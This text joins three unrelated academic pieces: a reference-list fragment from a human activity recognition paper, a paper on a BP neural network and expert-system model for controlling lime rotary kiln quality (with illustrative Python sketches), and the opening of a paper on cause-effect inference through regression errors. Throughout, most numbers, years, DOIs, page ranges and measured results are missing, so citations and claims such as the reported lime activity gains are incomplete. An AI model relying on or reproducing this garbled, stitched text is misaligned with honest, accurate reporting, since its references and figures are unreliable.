taylor w, shah sa, dashtipour k, zahid a, abbasi qh, imran ma. . an intelligent non- invasive real-time human activity recognition system for next-generation healthcare. sensors ( ): doi . /s . trost sg, cliff d, ahmadi m, van tuc n, hagenbuchner m. . sensor-enabled activity class recognition in preschoolers: hip versus wrist data. medicine and science in sports and exercise ( ): – doi . /mss. . uddin mt, billah mm, hossain mf. . random forests based recognition of human activities and postural transitions on smartphone. in: th international conference on informatics, electronics and vision (iciev). piscataway: ieee, – . garcía-domínguez et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.eswa. . . https://arxiv.org/abs/ . http://dx.doi.org/ . / . http://dx.doi.org/ . /s http://dx.doi.org/ . / / https://arxiv.org/abs/ . http://dx.doi.org/ . /s http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s http://dx.doi.org/ . /mss. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ uddin mt, uddiny ma. . human activity recognition from wearable sensors using extremely randomized trees. in: international conference on electrical engineering and information communication technology (iceeict). piscataway: ieee, – . uddin mz. . a wearable sensor-based activity prediction system to facilitate edge computing in smart healthcare system. journal of parallel and distributed computing : – doi . /j.jpdc. . . . van der oord a, dieleman s, zen h, simonyan k, vinyals o, graves a, kalchbrenner n, senior a, kavukcuoglu k. . wavenet: a generative model for raw audio. arxiv. available at https://arxiv.org/abs/ . . van rossum g. . python programming language. in: usenix annual technical conference, : . wang a, chen g, yang j, zhao s, chang c-y. . a comparative study on human activity recognition using inertial sensors in a smartphone. ieee sensors journal ( ): – doi . /jsen. . . wang h, divakaran a, vetro a, chang s-f, sun h. . survey of compressed-domain features used in audio-visual indexing and analysis. journal of visual communication and image representation ( ): – doi . /s - ( ) - . wang s, zhou g. . a review on radio based activity recognition. digital communications and networks ( ): – doi . /j.dcan. . . . westeyn tl, abowd gd, starner te, johnson jm, presti pw, weaver ka. . monitoring children’s developmental progress using augmented toys and activity recognition. personal and ubiquitous computing ( ): – doi . /s - - - . wortmann f, flüchter k. . internet of things. business & information systems engineering ( ): – doi . /s - - - . yarotsky d. . error bounds for approximations with deep relu networks. neural networks : – doi . /j.neunet. . . . zeng y, mao h, peng d, yi z. . spectrogram based multi-task audio classification. multimedia tools and applications ( ): – doi . /s - - - . zhang s, qin y, sun k, lin y. . few-shot audio classification with attentional graph neural networks. in: interspeech, – . ziuziański p, furmankiewicz m, sołtysik-piorunkiewicz a. . e-health artificial intelligence system implementation: case study of knowledge management dashboard of epidemiological data in poland. international journal of biology and biomedical engineering : – . garcía-domínguez et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.jpdc. . . https://arxiv.org/abs/ . http://dx.doi.org/ . /jsen. . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /j.dcan. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.neunet. . 
Application of improved BP neural network in a hybrid control model of lime quality

Lingli Zhu* — College of Information Technology, Luoyang Normal University, Luoyang, China; e-mail: zhulinglils@ .com
Tingzhong Wang — College of Information Technology, Luoyang Normal University, Luoyang, China

Abstract—In this paper, a method that combines a neural network with an expert system is proposed to realize a control model with real-time feedback of the control parameters. Based on the production-condition parameters, the model predicts the current lime quality. Using the predicted lime quality and the current control parameters, the association rule base of the expert system infers the required adjustment of the lime control parameters, which is fed back to the lime production control system in a timely manner, so that the quality of the lime is controlled in real time. The paper presents the application of an improved BP neural network in a hybrid control model of lime quality.

Keywords—improved neural network; lime; expert system; BP; hybrid control

I. Introduction
The goal of the production control process of the rotary kiln is to produce high-quality lime under the premise of stable output. The automatic control system of the lime rotary kiln can control the quality of the product by controlling the fuel quantity, the air quantity and the operation of the equipment. However, the quality of the lime cannot be measured in real time, so the production control system cannot obtain product quality information in time [ ]. At present, the control of the lime rotary kiln relies mainly on technical workers, who predict the current product quality from the state parameters monitored on-line by the process system and use this prediction as the basis for adjusting the control parameters. The quality of the product is therefore strongly influenced by human judgment or by off-line detection. In this paper, the ability of a neural network to model nonlinear mappings is used to predict product quality from the on-line monitored state parameters. Combined with the experience of domain experts, association rules are mined from the large amount of production data stored in the database; matching the quality prediction results against these rules yields the correction information for the control parameters of the lime rotary kiln, so that the control system achieves intelligent control with real-time quality prediction and accurate feedback adjustment.

II. Model and key technology of product quality control of the lime rotary kiln
The product quality control model of the lime rotary kiln is organized as shown in the flow-chart figure. The data preprocessing module receives data from the automatic control system of the lime rotary kiln as well as the data stored in the database. The product quality prediction model is then activated at a preset time interval, and the predicted product quality is compared with the preset quality information. If the requirements are met, the original control parameter information is maintained. If the requirements are not met, the control parameters and the product quality information are combined and matched against the association rule base to obtain the parameter adjustments, which are fed back to the automatic control system of the lime rotary kiln.
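The feedback loop just described can be summarized in a few lines of code. The sketch below is only a schematic reading of the flow chart, not the authors' implementation; the predictor, the rule base, the parameter names and the preset quality threshold are hypothetical placeholders.

```python
# Schematic sketch of the hybrid control loop (illustrative only, not the paper's code).
# predict_quality: a trained model mapping state parameters (x1..x5) to quality (z1, z2).
# rule_base: association rules mapping the diagnosed state to control-parameter corrections.

def control_step(state, controls, preset_quality, predict_quality, rule_base):
    """One pass of the quality control model: predict, compare and correct."""
    predicted = predict_quality(state)                   # current lime quality estimate
    if predicted["activity"] >= preset_quality:          # requirement met: keep settings
        return controls
    key = predicted["state"]                             # e.g. "over-burned" / "under-burned"
    correction = rule_base.get(key, {})                  # matched rule: parameter corrections
    return {name: controls[name] + correction.get(name, 0.0) for name in controls}

if __name__ == "__main__":
    # Dummy stand-ins so the sketch runs end to end.
    dummy_predict = lambda state: {"activity": 300.0, "state": "under-burned"}
    dummy_rules = {"under-burned": {"fuel": +0.5, "kiln_speed": -0.1, "exhaust_fan": 0.0}}
    controls = {"fuel": 10.0, "kiln_speed": 1.2, "exhaust_fan": 0.8}
    new_controls = control_step({"x1": 250.0}, controls, preset_quality=320.0,
                                predict_quality=dummy_predict, rule_base=dummy_rules)
    print(new_controls)
```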
The activity of the product can be reduced either by under-burning or by over-burning of the lime, and the operations needed to correct under-burning and over-burning are completely different, so it is necessary to distinguish the burning state of the lime. Secondly, the activity of lime produced from raw materials with different chemical compositions differs greatly, so each raw material must have its own corresponding product quality requirement. Therefore, in order to make a correct judgment, the quality of the product must be compared with the corresponding product quality setting.

The BP neural network is composed of an input layer (x), a hidden layer (h) and an output layer (z). The hidden layer can consist of one or more layers; this article chooses a neural network with only one hidden layer [ ]. For the three-layer BP neural network, the number of hidden-layer nodes can be determined by an empirical formula relating it to the numbers of input and output nodes, where m is the number of input-layer nodes, n is the number of output-layer nodes and p is the number of hidden-layer nodes. The BP neural network is an iterative algorithm that combines forward propagation of the data with back propagation of the error. The input signal is propagated through the activation function to the hidden layer, and the hidden-layer outputs are propagated through the activation function to the output layer. The error between the computed output and the expected output is calculated, the weights of each layer are modified along the negative gradient of the error, and the error signal is propagated back along the original path; the outputs are then recomputed, as shown in the figure, until the error reaches the desired value.

[Figure: flow chart of the control model.]

The lime rotary kiln control system monitors many on-line condition parameters (x); some reflect the production condition of the process system, some are safety-protection monitoring parameters, and some have both characteristics. According to actual production experience, the exhaust gas temperature (x1), the kiln tail temperature (x2), the kiln pressure (x3), the secondary air temperature (x4) and the feed temperature (x5) are the factors that reflect lime quality most significantly. The control parameters (y) of the lime rotary kiln essentially determine the quality of the product; the fuel consumption (y1), the rotary kiln rotation speed (y2), the main exhaust fan (y3) and other control parameters are the decisive parameters for product quality. The product quality information (z) contains the lime activity (z1) and the product burning state (z2) [ ][ ][ ]. First, the higher the activity of the lime, the better the quality of the product; in the ideal state, lime that is neither under-burned nor over-burned has the highest activity. In the production process of the lime rotary kiln there are inevitably abnormal conditions, such as mechanical equipment failures or abnormal monitoring equipment, which distort the on-line detection data. If such data are not filtered out, the system model will issue wrong instructions and affect the normal operation of the system. For this kind of abnormal data point, filtering, mean filling and other means are applied to ensure the accuracy and integrity of the data.
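A minimal sketch of the preprocessing just mentioned (masking distorted on-line readings and mean-filling the gaps) is given below. The column names and the plausible value ranges are assumptions made only for illustration, not values taken from the paper.

```python
# Illustrative preprocessing sketch: mask physically implausible sensor readings and
# fill the resulting gaps with column means (assumed ranges, not from the paper).
import pandas as pd

PLAUSIBLE_RANGES = {          # hypothetical admissible intervals per monitored parameter
    "exhaust_gas_temp": (0.0, 600.0),
    "kiln_tail_temp": (0.0, 1200.0),
    "kiln_pressure": (-500.0, 500.0),
    "secondary_air_temp": (0.0, 900.0),
    "feed_temp": (0.0, 1300.0),
}

def clean_state_parameters(df: pd.DataFrame) -> pd.DataFrame:
    cleaned = df.copy()
    for column, (low, high) in PLAUSIBLE_RANGES.items():
        if column in cleaned:
            out_of_range = (cleaned[column] < low) | (cleaned[column] > high)
            cleaned[column] = cleaned[column].mask(out_of_range)     # distorted -> NaN
    return cleaned.fillna(cleaned.mean(numeric_only=True))           # mean filling

if __name__ == "__main__":
    raw = pd.DataFrame({"exhaust_gas_temp": [250.0, 9999.0, 240.0],
                        "kiln_pressure": [-120.0, -130.0, None]})
    print(clean_state_parameters(raw))
```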
III. Construction of the expert system rule base
When the predicted product quality is not ideal, the control parameters need to be adjusted in order to achieve the goal of product quality control. The product quality information predicted by the neural network for the current period is compared with the preset information; the resulting quality parameters (z1^j, z2^j) together with the current control parameters (y1^j, y2^j, y3^j) form the premise of the association rule, and the matched corrections of the control parameters (Δy1^j, Δy2^j, Δy3^j) form the output item. The optimized control parameters for the next time interval are then

    y_i^{j+1} = y_i^j + Δy_i^j,  i = 1, 2, 3.

The BP neural network algorithm is as follows:
(1) Initialization. Random values are assigned as the initial weights of the network, and the number of learning iterations N and the required accuracy are set.
(2) Read a training sample k together with its corresponding expected output.
(3) Compute the output value of hidden node i: h_i^k = f( Σ_a w_{ai} x_a^k + θ_i ), where the sum runs over the m input nodes.
(4) Compute the output value of node j of the output layer: z_j^k = f( Σ_i v_{ij} h_i^k + θ_j ), where the sum runs over the p hidden nodes.
(5) Correct the weights between the output layer and the hidden layer: v_{ij}(n+1) = v_{ij}(n) + η δ_j^k h_i^k + b [v_{ij}(n) − v_{ij}(n−1)], where δ_j^k is the error signal of output node j, η is the learning rate and b is the additional momentum term; their values are determined as in [ ].
(6) Correct the weights between the hidden layer and the input layer analogously: w_{ai}(n+1) = w_{ai}(n) + η δ_i^k x_a^k + b [w_{ai}(n) − w_{ai}(n−1)], where δ_i^k is the error signal back-propagated to hidden node i.
(7) Judgment. If not all samples have been read, jump to step (2); otherwise continue with the next step.
(8) With the weights corrected according to steps (5) and (6), recompute the output of each layer using the formulas of steps (3) and (4).
(9) Compute the global error: E = (1/2) Σ_k Σ_j ( z_j^k − o_j^k )², where o_j^k is the expected output of node j for sample k.
(10) Judgment. If the error reaches the design accuracy or the maximum number of training iterations is exceeded, training stops; otherwise set n = n + 1 and return to step (2).
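The training loop described in steps (1)–(10) can be sketched compactly with NumPy. The code below is an illustrative reconstruction of a plain momentum BP network, not the authors' implementation; the layer size, learning rate, momentum term and stopping thresholds are assumed values, and the XOR data set is only a stand-in for the quality prediction task.

```python
# Illustrative momentum-BP sketch of steps (1)-(10); hyperparameters are assumed values.
import numpy as np

def sigmoid(a):
    return 1.0 / (1.0 + np.exp(-a))

def train_bp(X, T, n_hidden=6, eta=0.1, momentum=0.7, tol=1e-3, max_epochs=10000, seed=0):
    """Three-layer BP network trained sample by sample with learning rate eta and momentum."""
    rng = np.random.default_rng(seed)
    m, n = X.shape[1], T.shape[1]                        # input / output node numbers
    W = rng.uniform(-0.5, 0.5, (m, n_hidden))            # input -> hidden weights, step (1)
    V = rng.uniform(-0.5, 0.5, (n_hidden, n))            # hidden -> output weights
    th_h = np.zeros(n_hidden)                            # hidden thresholds
    th_o = np.zeros(n)                                   # output thresholds
    dW_prev, dV_prev = np.zeros_like(W), np.zeros_like(V)
    error = np.inf
    for epoch in range(max_epochs):
        for x, t in zip(X, T):                           # steps (2)-(7): one sample at a time
            h = sigmoid(x @ W + th_h)                    # hidden output, step (3)
            z = sigmoid(h @ V + th_o)                    # output layer, step (4)
            delta_out = (t - z) * z * (1.0 - z)          # output error signal
            delta_hid = (delta_out @ V.T) * h * (1.0 - h)
            dV = eta * np.outer(h, delta_out) + momentum * dV_prev   # step (5)
            dW = eta * np.outer(x, delta_hid) + momentum * dW_prev   # step (6)
            V += dV
            W += dW
            th_o += eta * delta_out
            th_h += eta * delta_hid
            dV_prev, dW_prev = dV, dW
        Z = sigmoid(sigmoid(X @ W + th_h) @ V + th_o)    # recompute all outputs, step (8)
        error = 0.5 * np.sum((Z - T) ** 2)               # global error, step (9)
        if error <= tol:                                 # step (10): stop on accuracy or epoch limit
            break
    return (W, th_h, V, th_o), error

if __name__ == "__main__":
    X = np.array([[0, 0], [0, 1], [1, 0], [1, 1]], dtype=float)
    T = np.array([[0], [1], [1], [0]], dtype=float)
    _, err = train_bp(X, T)
    print("final global error:", err)
```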
The model mines association rules with OLAP and the Apriori algorithm in order to find the relationship between the product quality information and the adjustments of the control parameters. The mining of association rules between product quality information and control parameters draws on the production-process data describing how control-parameter adjustments affect product quality. On-line analytical processing (OLAP) is the main data analysis tool in a data warehouse; the OLAP system uses a materialized data cube as its storage scheme, trading space cost for time efficiency. For association rule mining, a large amount of the intermediate data used in the mining process may already be materialized in the data cube and does not need to be recomputed.

IV. Running examples of the neural network forecast model
The sample data come from the lime rotary kiln production line of a steel mill. In the enterprise, product quality is checked every hour by sampling from the sampling hole and judging the product quality by the naked eye; at longer intervals the quality of the product (its activity) is determined by an experimental method, so the samples selected here are based on the experimentally measured data. Data recorded over several days of normal equipment operation were selected as samples, of which one part was used as training samples and the remainder as test samples, as shown in Table I.

[Table I: sample data. Columns: sample no., exhaust gas temperature (°C), kiln inlet temperature (°C), kiln inlet pressure (Pa), secondary air temperature (°C), product temperature (°C), activity (ml), product state (over-burned / under-burned).]

Definition: the "sum" rule for the values of the same attribute in the n-dimensional data is defined as follows. Let sum = attribute.value1 + attribute.value2. If attribute.value1 is not empty and attribute.value1 == attribute.value2, then sum = n + 1; if attribute.value1 is null and attribute.value2 is not empty, or attribute.value1 is not empty and attribute.value2 is empty, then sum = 1; in all other cases, sum = 0. This rule can be used to determine whether frequent attribute sets satisfy the connection (join) condition. To judge whether two k-item frequent attribute sets trans1 and trans2 satisfy the join condition, the corresponding attribute values of trans1 and trans2 are added according to the sum rule and all results are accumulated into result. Writing n for the number of fields in the data table, if result = (n + 1)(k − 1) + 2, then trans1 and trans2 agree in (k − 1) non-null attribute values and differ in two attribute values whose individual sums are 1, i.e., in each of these two positions exactly one non-null attribute value is present. In this case trans1 and trans2 satisfy the connection condition and the connection operation can be performed; otherwise, trans1 and trans2 cannot be connected. For frequent sets trans1 and trans2 that satisfy the connection condition, the connection can be realized by the "add" operation. In order to carry out this operation on the frequent attribute sets, the "or" rule for the attribute values is defined first.

From the production site, the measured lime activity before and after one month of using the quality control system is compared in the figure below.

[Figure: comparison of the measured lime activity (ml) of the samples before and after using the quality control system.]

From the figure it can be seen that with the quality control system in use, the average lime activity is about ml, greatly improved compared with the previous average level of about ml. In addition, apart from specific time periods, the variation of the lime activity is kept within ml, which indicates that the stability of the lime production system is greatly improved.

V. Conclusion
This paper presents a product quality prediction and control-parameter feedback control model for lime rotary kiln products based on the combination of a neural network and an association rule library. The model can accurately predict the quality of the products on-line and feed the control-parameter adjustment information back in a timely manner. In the control model, a step for reading and preprocessing the state-parameter data is added to improve the robustness of the control model and to reduce the influence of equipment failures on the stability of the system.

Acknowledgements
This paper is supported by the Science and Technology Project of Henan Province ( , ).

References
[1] Liu Xiao-li, Wang Shen-tao, Dai Rui, Wei Shi-feng, "On fault diagnosis of network based on improved particle swarm optimization", Computer Applications and Software.
[ ] wang cheng-liang,pang xu,lu zhi-jian, “research on hybrid control methods of aluminium reduction on neural network”, application research of computer, vol. ,no. , ( ),pp. - . [ ] li dao-zhong,zhang lei,wu zhao-hui, “test method of physical metallurgical lime, bei jing:metallurgical industry press,( ),pp. - . [ ] chu hui, lai hui-cheng, “an improved back-propagation n algoriythm and its application”, computer simulation,vol. , no. , ( ), pp. - . [ ] shi zhong-zhi, “knowledge discovery”,bei jing:tsinghua university press, ( ),pp. - . [ ] zhang lei, hu chun, qian feng, “research progress of bp algorithm for local minimum problem”, the industrial control computer, vol. ,no. , ( ),pp. - . submitted september accepted december published january corresponding author patrick blöbaum, bloebaum@ar.sanken.osaka-u.ac.jp academic editor charles elkan additional information and declarations can be found on page doi . /peerj-cs. copyright blöbaum et al. distributed under creative commons cc-by . open access analysis of cause-effect inference by comparing regression errors patrick blöbaum , dominik janzing , takashi washio , shohei shimizu and bernhard schölkopf osaka university, osaka, japan mpi for intelligent systems, tübingen, germany shiga university, shiga, japan abstract we address the problem of inferring the causal direction between two variables by comparing the least-squares errors of the predictions in both possible directions. under the assumption of an independence between the function relating cause and effect, the conditional noise distribution, and the distribution of the cause, we show that the errors are smaller in causal direction if both variables are equally scaled and the causal relation is close to deterministic. based on this, we provide an easily applicable algorithm that only requires a regression in both possible causal directions and a comparison of the errors. the performance of the algorithm is compared with various related causal inference methods in different artificial and real-world data sets. subjects artificial intelligence, data mining and machine learning keywords causality, causal discovery, cause-effect inference introduction causal inference (spirtes, glymour & scheines, ; pearl, ) is becoming an increasingly popular topic in machine learning. the results are often not only of interest in predicting the result of potential interventions, but also in general statistical and machine learning applications (peters, janzing & schölkopf, ). while the causal relationship between variables can generally be discovered by performing specific randomized experiments, such experiments can be very costly, infeasible or unethical . in particular, the identification of the causal direction between two variables without performing any interventions is a challenging task. however, recent research developments in causal discovery allow, under certain assumptions, inference of the causal direction between two variables purely based on observational data (kano & shimizu, ; comley & dowe, ; shimizu et al., ; sun, janzing & schölkopf, ; zhang & hyvärinen, ; hoyer et al., ; janzing, sun & schölkopf, ; daniušis et al., ; peters, janzing & schölkopf, ; janzing et al., ; sgouritsa et al., ; mooij et al., ; marx & vreeken, ). in regard to the present work, we further contribute to the causal discovery in an unconfounded bivariate setting based on observational data, where one variable is the cause and the other variable is the effect. 
That is, given observed data X, Y that are drawn from a joint distribution P_{X,Y}, we are interested in inferring whether X caused Y or Y caused X. In this sense, we define X as the cause and Y as the effect if intervening on X changes the distribution of Y. In the following, we use the term "causal inference" to refer to the identification of the true causal direction. (Further discussions about ethics in randomized experiments, especially in the context of clinical trials, can be found in Rosner ( ).) A possible application is the discovery of molecular pathways, which relies on the identification of causal molecular interactions in genomics data (Statnikov et al., ). Other examples in biomedicine where observational data can be used for causal discovery are discussed in the work by Ma & Statnikov ( ).

An example of a bivariate relationship is provided in the figure below, where the national income of countries is compared with the life expectancy at birth (the data are taken from https://webdav.tuebingen.mpg.de/cause-effect/ and are further discussed in Mooij et al. ( )).

[Figure: a comparison of the national income of countries and the life expectancy at birth. (A) The national income on the x-axis and the life expectancy on the y-axis. (B) The life expectancy on the x-axis and the national income on the y-axis.]

Here, a clear statement about the causal relationship is not obvious. It has been argued that richer countries have a better health care system than poorer countries; hence, a higher national income leads to a higher life expectancy (Mooij et al., ). Based on the plots alone, this causal relationship is not clear at all. Nevertheless, we provide a way to correctly determine the causal direction by only using these data points.

Conventional approaches to causal inference rely on conditional independences and therefore require at least three observed variables. Given the observed pattern of conditional dependences and independences, one infers a class of directed acyclic graphs (DAGs) that is compatible with the respective pattern (subject to the Markov condition and faithfulness assumption (Spirtes, Glymour & Scheines, ; Pearl, )). Whenever there are causal arrows that are common to all DAGs in the class, conditional (in)dependences yield definite statements about causal directions. In a bivariate setting, however, we rely on asymmetries between cause and effect that are already apparent in the bivariate distribution alone. One kind of asymmetry is given by restricting the structural equations relating cause and effect to a certain function class: for linear relations with non-Gaussian independent noise, the linear non-Gaussian acyclic model (LiNGAM) (Shimizu et al., ) provides a method to identify the correct causal direction.
for nonlinear relations, the additive noise model (anm) (hoyer et al., ) and its generalization to post-nonlinear models (pnl) (zhang & hyvärinen, ) identify the causal direction by assuming an independence blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://webdav.tuebingen.mpg.de/cause-effect/ https://webdav.tuebingen.mpg.de/cause-effect/ https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. between cause and noise, where, apart from some exceptions such as bivariate gaussian, a model can only be fit in the correct causal direction such that the input is independent of the residual. further recentapproaches forthe bivariatesetting arebased on an informal independence assumption stating that the distribution of the cause (denoted by pc) contains no information about the conditional distribution of the effect given the cause (denoted by pe|c). here, the formalization of ‘no information’ is a challenging task. for the purpose of foundational insights (rather than for practical purposes), janzing & schölkopf ( ) and lemeire & janzing ( ) formalize the idea via algorithmic information and postulate that knowing pc does not enable a shorter description of pe|c and vice versa. using algorithmic information theory, one can, for instance, show that the algorithmic independence of pc and pe|c implies k(pc)+k(pe|c)≤k(pe)+k(pc|e), ( ) if k denotes the description length of a distribution in terms of its kolmogorov complexity (for details see section . . in peters, janzing & schölkopf ( )). in this sense, appropriate independence assumptions between pc and pe|c imply that pe,c has a simpler description in causal direction than in anticausal direction. an approximation of ( ) is given by the slope algorithm in the work by marx & vreeken ( ), where regression is utilized to estimate and compare the approximated kolmogorov complexities. for this, a logarithmic error is used, which is motivated by a minimum description length perspective. another work that is inspired by the independence assumption is the information-geometric approach for causal inference (igci) (janzing et al., ). igci provides a method to infer the causal direction in deterministic nonlinear relationships subject to a certain independence condition between the slope of the function and the distribution of the cause. a related but different independence assumption is also used by a technique called unsupervised inverse regression (cure) (sgouritsa et al., ), where the idea is to estimate a prediction model of both possible causal directions in an unsupervised manner, i.e., only the input data is used for the training of the prediction models. with respect to the above independence assumption, the effect data may contain information about the relation between cause and effect that can be employed for predicting the cause from the effect, but the cause data alone does not contain any information that helps the prediction of the effect from the cause (as hypothesized in schölkopf et al. ( )). accordingly, the unsupervised regression model in the true causal direction should be less accurate than the prediction model in the wrong causal direction. for our approach, we address the causal inference problem by exploiting an asymmetry in the mean-squared error (mse) of predicting the cause from the effect and the effect from the cause, respectively, and show, that under appropriate assumptions and in the regime of almost deterministic relations, the prediction error is smaller in causal direction. 
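Before the formal treatment in the following sections, the core procedure can be sketched in a few lines: rescale both variables to a common range, regress in both possible directions with a nonparametric regressor, and prefer the direction with the smaller mean-squared error. The sketch below is illustrative only; the choice of regressor, the min–max scaling and the variable names are assumptions, and the actual algorithm and its evaluation are described later in the paper.

```python
# Illustrative sketch of the error-comparison idea (not the paper's exact algorithm):
# regress Y on X and X on Y after scaling both to [0, 1], then compare the MSEs.
import numpy as np
from sklearn.neighbors import KNeighborsRegressor

def _mse_of_regression(inputs, targets, n_neighbors=5):
    model = KNeighborsRegressor(n_neighbors=n_neighbors)
    model.fit(inputs.reshape(-1, 1), targets)
    residuals = targets - model.predict(inputs.reshape(-1, 1))
    return np.mean(residuals ** 2)

def infer_direction(x, y):
    """Return 'X -> Y' if the regression error is smaller in that direction, else 'Y -> X'."""
    def rescale(v):
        return (v - v.min()) / (v.max() - v.min())
    x, y = rescale(np.asarray(x, float)), rescale(np.asarray(y, float))
    mse_x_to_y = _mse_of_regression(x, y)   # error of predicting the candidate effect
    mse_y_to_x = _mse_of_regression(y, x)
    return "X -> Y" if mse_x_to_y <= mse_y_to_x else "Y -> X"

if __name__ == "__main__":
    rng = np.random.default_rng(1)
    cause = rng.uniform(0, 1, 2000)
    effect = cause ** 3 + 0.05 * rng.normal(size=cause.size)   # almost deterministic relation
    print(infer_direction(cause, effect))
```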
A preliminary version of this idea can be found in Blöbaum, Washio & Shimizu ( ) and Blöbaum, Shimizu & Washio ( ), but in these works the analysis is based on a simple heuristic assuming that the regression of Y on X and the regression of X on Y yield functions that are inverse to each other, which holds approximately in the limit of small noise. Moreover, the analysis is also based on the assumption of an additive noise model in causal direction and on having prior knowledge about the functional relation between X and Y, which makes it impractical for generic causal inference problems. In this work, we aim to generalize and extend the two aforementioned works in several ways: (1) we explicitly allow a dependency between cause and noise, (2) we give a proper mathematical proof of the theory that justifies the method subject to clear formal assumptions, and (3) we perform extensive evaluations for the application in causal inference and compare it with various related approaches. The theorem stated in this work might also be of interest for general statistical purposes. A briefer version of this work with less extensive experiments, fewer details and without detailed proofs can be found in Blöbaum et al. ( ).

This paper is structured as follows: in "Preliminaries", we define the problem setting and introduce the notations and assumptions that are necessary for the main theorem of this work stated in "Theory". An algorithm that utilizes this theorem is proposed and evaluated on various artificial and real-world data sets in "Experiments".

Preliminaries
In the following, we introduce the preliminary problem setting, notations and assumptions.

Problem setting and notation
In this work, we use the framework of structural causal models (Pearl, ) with the goal of correctly identifying cause and effect variables of given observations from X and Y. As illustrated in the figure below, this can be described by the problem of identifying whether the causal DAG X → Y or X ← Y is true.

[Figure: an illustration of the goal of our proposed method ("X → Y or X ← Y?"). It aims to identify the causal DAG of two variables, where either X causes Y or Y causes X.]

Throughout this paper, a capital letter denotes a random variable and a lowercase letter denotes values attained by the random variable. Variables X and Y are assumed to be real-valued and to have a joint probability density (with respect to the Lebesgue measure), denoted by P_{X,Y}. By slightly abusing terminology, we will not further distinguish between a distribution and its density, since the Lebesgue measure as a reference is implicitly understood. The notations P_X, P_Y and P_{Y|X} are used for the corresponding marginal and conditional densities, respectively. The derivative of a function f is denoted by f′.

General idea
As mentioned before, the general idea of our approach is to simply compare the MSE of regressing Y on X with the MSE of regressing X on Y.
therefore, we assume the general structural equation defined in ( ), whereas anm assumes a more restrictive structural equation of the form e =ζ(c)+ñ with cyñ . by c,e ∈{x,y}, respectively, our approach explicitly reads as follows. let φ denote the function that minimizes the expected least squares error when predicting e from c, which implies that φ is given by the conditional expectation φ(c)=e[e|c]. likewise, let ψ be the minimizer of the least squares error for predicting c from e, that is, ψ(e)=e[c|e]. then we will postulate assumptions that imply e[(e−φ(c)) ]≤e[(c−ψ(e)) ] ( ) in the regime of almost deterministic relations. this conclusion certainly relies on some kind of scaling convention. for our theoretical results we will assume that both x and y attain values between and . however, in some applications, we will also scale x and y to unit variance to deal with unbounded variables. equation ( ) can be rewritten in terms of conditional variance as e[var[e|c]]≤e[var[c|e]]. assumptions first, recall that we assume throughout the paper that either x is the cause of y or vice versa in an unconfounded sense, i.e., there is no common cause. therefore, the general structural equation is defined as e =ζ(c,ñ), ( ) where cyñ . for our analysis, we first define a function φ to be the conditional expectation of the effect given the cause, i.e., φ(c) :=e[e|c] and, accordingly, we define a noise variable n as the residual n :=e−φ(c). ( ) note that ( ) implies that e[n|c]= . the function φ is further specified below. then, to study the limit of an almost deterministic relation in a mathematically precise way, we consider a family of effect variables eα by eα :=φ(c)+αn, ( ) where α∈r+ is a parameter controlling the noise level and n is a noise variable that has some (upper bounded) joint density pn,c with c. note that n here does not need to be statistically independent of c (in contrast to anms), which allows the noise to be non-additive. therefore, ( ) does not, a priori, restrict the set of possible causal relations, because for any pair (c,e) one can always define the noise n as ( ) and thus obtain eα= =e for any arbitrary function φ . for this work, we make use of the following assumptions: . invertible function: φ is a strictly monotonically increasing two times differentiable function φ : [ , ]→[ , ]. for simplicity, we assume that φ is monotonically increasing with φ( )= and φ( )= (similar results for monotonically decreasing functions follow by reflection e → −e). we also assume that φ− ′ is bounded. blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. note, however, that the assignment ( ) is not a structural equation in a strict sense, because then c and n would need to be statistically independent. . compact supports: the distribution of c has compact support. without loss of generality, we assume that and are, respectively, the smallest and the largest values attained by c. we further assume that the distribution of n has compact support and that there exist values n+ > > n− such that for any c, [n−,n+] is the smallest interval containing the support of pn|c. this ensures that we know [αn−, +αn+] is the smallest interval containing the support of peα. then the shifted and rescaled variable ẽα := +αn+−αn− (eα−αn−) ( ) attains and as minimum and maximum values and thus is equally scaled as c. . 
unit noise variance: the expected conditional noise variance is e[var[n|c]]= without loss of generality, seeing that we can scale the noise arbitrary by the parameter α and we are only interested in the limit α→ . . independence postulate: while the above assumptions are just technical, we now state the essential assumption that generates the asymmetry between cause and effect. to this end, we consider the unit interval [ , ] as probability space with uniform distribution as probability measure. the functions c →φ′(c) and c →var[n|c]pc(c) define random variables on this space, which we postulate to be uncorrelated, formally stated as cov[φ′,var[n|c]pc]= . ( ) more explicitly, ( ) reads:∫ φ ′(c)var[n|c]pc(c)dc− ∫ φ ′(c)dc ∫ var[n|c]pc(c)dc = . ( ) the justification of ( ) is not obvious at all. for the special case where the conditional variance var[n|c] is a constant in c (e.g., for anms), ( ) reduces to cov[φ′,pc]= , ( ) which is an independence condition for deterministic relations stated in schölkopf et al. ( ). conditions of similar type as ( ) have been discussed and justified in janzing et al. ( ). they are based on the idea that φ contains no information about pc. this, in turn, relies on the idea that the conditional pe|c contains no information about pc. to discuss the justification of ( ), observe first that it cannot be justified as stating some kind of ‘independence’ between pc and pe|c. to see this, note that ( ) states an uncorrelatedness of the two functions c →φ′(c) and c →var[n|c]pc(c). while φ′ depends only on the conditional pe|c and not on pc, the second function depends on both pc|e and pe, since var[n|c] is a property of pe|c. nevertheless, to justify ( ) we assume that the function φ represents a law of nature that persists when pc and n change due to changing background conditions. from this perspective, it becomes unlikely that they are related to the background condition at hand. this idea follows the general spirit of ‘modularity and autonomy’ in structural equation modeling, that some structural equations may remain unchanged when other parts of a system change (see chapter in peters, janzing & schölkopf ( ) for a literature review) . to further justify ( ), one could think of a scenario where someone changes φ independently of pn,c, which then results in vanishing correlations. typically, this assumption would be violated if φ is adjusted to pn,c or vice versa. this could happen due to an intelligent design by, for instance, first blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. observing pn,c and then defining φ or due to a long adaption process in nature (see janzing et al. ( ) for further discussions of possible violations in a deterministic setting). a simple implication of ( ) reads∫ φ ′(c)var[n|c]pc(c)dc = , ( ) due to ∫ φ 